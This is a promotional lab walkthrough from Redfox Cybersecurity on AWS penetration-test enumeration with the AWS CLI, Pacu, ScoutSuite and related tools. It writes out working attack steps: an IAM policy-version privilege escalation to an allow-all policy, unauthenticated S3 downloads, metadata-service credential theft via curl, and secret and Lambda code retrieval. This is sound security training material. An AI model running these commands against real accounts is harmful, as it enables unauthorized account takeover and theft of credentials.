Cloud environments have become the backbone of modern infrastructure, and Amazon Web Services sits at the center of that shift. With that dominance comes a massive attack surface that many organizations still do not fully understand how to secure. Enumeration is where every meaningful cloud penetration test begins, and AWS is one of the most target-rich environments a tester will ever work with.
This lab walkthrough is designed for security professionals who want to move beyond theory and get their hands dirty with real tools and real commands. Whether you are preparing for an engagement or building your cloud security skills through the Redfox Cybersecurity Academy, this guide will walk you through how professional red teamers enumerate AWS environments systematically and surgically.
Before you touch a single API call, you need a controlled lab environment. Create a free-tier AWS account or use an intentionally vulnerable environment like CloudGoat by Rhino Security Labs. Never run enumeration tools against environments you do not have explicit written permission to test.
You will need the following installed on your attack machine:
Start by configuring your AWS credentials with a low-privilege IAM user, as that is the most realistic starting point for an assumed-breach or phishing-derived credential scenario.
aws configure
# AWS Access Key ID: AKIAIOSFODNN7EXAMPLE
# AWS Secret Access Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# Default region name: us-east-1
# Default output format: json
[cta]
Once configured, verify the identity of the credentials before doing anything else. This tells you who you are operating as, which account you are in, and what ARN is associated with the keys.
aws sts get-caller-identity
[cta]
The output will look something like this:
{
"UserId": "AIDAIOSFODNN7EXAMPLE",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/dev-readonly"
}
[cta]
IAM is the single most important service to enumerate in AWS. Misconfigured IAM policies are the root cause of the majority of serious cloud breaches. Understanding what permissions your compromised credentials have, and what other principals exist in the environment, is non-negotiable before moving forward.
# List all IAM users
aws iam list-users --output table
# List all IAM groups
aws iam list-groups
# List all IAM roles
aws iam list-roles
# List attached policies for a specific user
aws iam list-attached-user-policies --user-name dev-readonly
# List inline policies for a specific user
aws iam list-user-policies --user-name dev-readonly
[cta]
For situations where you have credentials but are unsure what actions they can perform, use the enumerate-iam tool. It systematically brute-forces IAM permissions by calling every available API action and recording which ones succeed.
git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam
pip install -r requirements.txt
python enumerate-iam.py \
--access-key AKIAIOSFODNN7EXAMPLE \
--secret-key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY \
--region us-east-1
[cta]
This is far more efficient than manually guessing permissions and gives you a clear picture of what is accessible. The output maps every successful API call, which directly informs your privilege escalation and lateral movement decisions.
If you want structured, professional-grade results, the team at Redfox Cybersecurity uses a combination of automated enumeration and manual validation to ensure nothing is missed during cloud security assessments.
Once you have a list of allowed IAM actions, cross-reference them against known privilege escalation techniques. Some of the most dangerous permissions include:
iam:CreatePolicyVersioniam:AttachUserPolicyiam:PassRole combined with ec2:RunInstancessts:AssumeRolelambda:CreateFunction combined with iam:PassRole# Check if you can create a new policy version (classic privesc vector)
aws iam create-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
--policy-document file://admin_policy.json \
--set-as-default
[cta]
Where admin_policy.json contains:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
[cta]
S3 is often the most immediately rewarding service to enumerate. Misconfigured buckets have leaked sensitive data from companies across every industry.
# List all buckets accessible to the current identity
aws s3 ls
# List contents of a specific bucket
aws s3 ls s3://target-bucket-name --recursive
# Check bucket ACL configuration
aws s3api get-bucket-acl --bucket target-bucket-name
# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket-name
# Check if public access block is disabled
aws s3api get-public-access-block --bucket target-bucket-name
[cta]
If a bucket has no public access block and a permissive bucket policy, you may be able to download objects without any credentials at all. Always test for unauthenticated access separately.
# Test unauthenticated access using no-sign-request
aws s3 ls s3://target-bucket-name --no-sign-request
# Download a file without credentials
aws s3 cp s3://target-bucket-name/sensitive-file.txt . --no-sign-request
[cta]
Bucket names can also be discovered through certificate transparency logs, GitHub leaks, and subdomain enumeration. Tools like cloud_enum automate this process across multiple cloud providers simultaneously.
git clone https://github.com/initstring/cloud_enum.git
cd cloud_enum
pip3 install -r requirements.txt
python3 cloud_enum.py -k targetcompanyname \
--disable-azure \
--disable-gcp
[cta]
Building these skills in a structured lab environment is something the Redfox Cybersecurity Academy specifically emphasizes in its cloud security curriculum. Practical, repeatable labs built around real misconfigurations are what separate capable cloud testers from those who only understand theory.
EC2 instances are compute workloads, and enumerating them reveals what is running inside the environment, what IAM roles are attached, and whether the Instance Metadata Service is exposed.
# List all EC2 instances with key details
aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].[InstanceId,InstanceType,State.Name,PublicIpAddress,PrivateIpAddress,IamInstanceProfile.Arn]' \
--output table
# List security groups and their rules
aws ec2 describe-security-groups \
--query 'SecurityGroups[*].[GroupId,GroupName,Description]' \
--output table
# Find instances with public IPs and open SSH/RDP
aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
--query 'Reservations[*].Instances[*].[PublicIpAddress,KeyName,IamInstanceProfile.Arn]'
[cta]
If you gain SSRF on an EC2 instance or have shell access, the Instance Metadata Service is your first stop. IMDSv1 requires no authentication and returns IAM credentials directly.
# From within the EC2 instance or via SSRF
curl http://169.254.169.254/latest/meta-data/
# Get the IAM role name attached to the instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Retrieve the temporary credentials for the attached role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName
[cta]
The response will contain AccessKeyId, SecretAccessKey, and Token, which you can immediately plug into your AWS CLI profile to operate as the attached role, potentially with far more privileges than your original credentials.
export AWS_ACCESS_KEY_ID=ASIAxxxxxxxxxxxxxxxx
export AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
export AWS_SESSION_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
aws sts get-caller-identity
[cta]
This technique is particularly relevant in SSRF vulnerabilities affecting web applications hosted on EC2. A single SSRF bug in an application can pivot directly into full AWS account compromise if the attached role is over-privileged.
Pacu is the go-to framework for AWS penetration testing. Developed by Rhino Security Labs, it organizes enumeration and exploitation into modular operations.
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu
pip3 install -r requirements.txt
python3 pacu.py
[cta]
Inside Pacu, set your keys and run enumeration modules:
Pacu > import_keys --profile default
Pacu > run iam__enum_users_roles_policies_groups
Pacu > run ec2__enum
Pacu > run s3__enum
Pacu > run lambda__enum
Pacu > run iam__privesc_scan
[cta]
The iam__privesc_scan module is particularly valuable. It cross-references your current permissions against every documented IAM privilege escalation path and tells you exactly which ones are exploitable with your current credentials.
For organizations looking to test how their own AWS environment holds up against these techniques, the cloud penetration testing services at Redfox Cybersecurity provide thorough adversary simulation tailored to cloud-native environments.
ScoutSuite takes a different approach by performing read-only enumeration across all AWS services and producing a detailed HTML report highlighting misconfigurations against security best practices.
pip install scoutsuite
# Run ScoutSuite against an AWS account using a named profile
scout aws --profile default --report-dir ./scoutsuite-report
# Run with specific services only
scout aws --profile default --services iam,s3,ec2,rds,lambda
[cta]
ScoutSuite organizes its findings by service and severity. It flags things like:
The report is generated as a local HTML file and serves as excellent documentation during a red team engagement or cloud security review.
Serverless functions and secrets storage are two areas that are consistently overlooked but extremely valuable during an assessment.
# List all Lambda functions
aws lambda list-functions \
--query 'Functions[*].[FunctionName,Runtime,Role,LastModified]' \
--output table
# Download Lambda function source code
aws lambda get-function \
--function-name target-function \
--query 'Code.Location' \
--output text | xargs curl -o function.zip
# List all secrets in Secrets Manager
aws secretsmanager list-secrets
# Retrieve the value of a specific secret
aws secretsmanager get-secret-value \
--secret-id prod/database/credentials
[cta]
Lambda source code frequently contains hardcoded API keys, internal hostnames, database connection strings, and logic that reveals how the application functions internally. Downloading and reviewing function code is a high-yield activity during any AWS assessment.
Secrets Manager retrieval succeeds far more often than it should during engagements. Developers frequently over-provision access to secrets for convenience, leaving a wide-open path for any compromised principal with secretsmanager:GetSecretValue.
AWS enumeration is not a single action. It is a methodical, service-by-service process of mapping what exists, who can access it, and how those access paths can be chained into something impactful. The techniques covered in this lab, from IAM permission enumeration and S3 bucket analysis to IMDS credential theft and Pacu-driven privilege escalation scanning, reflect what modern cloud penetration testers actually do during real engagements.
The toolchain matters, but so does the mental model. Understanding how AWS IAM, resource policies, and service-linked roles interact is what separates a tester who finds surface-level misconfigurations from one who chains together a full account takeover.
If you want to build these skills in a structured, hands-on curriculum, the Redfox Cybersecurity Academy offers dedicated cloud security courses that walk through exactly these scenarios with guided labs and real AWS environments.
For organizations that need a professional team to assess their AWS posture before an attacker does, the cloud security specialists at Redfox Cybersecurity conduct thorough, adversary-simulated cloud penetration tests that go well beyond automated scanning.
The cloud is not inherently insecure. But it is only as secure as the people who configure and test it.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
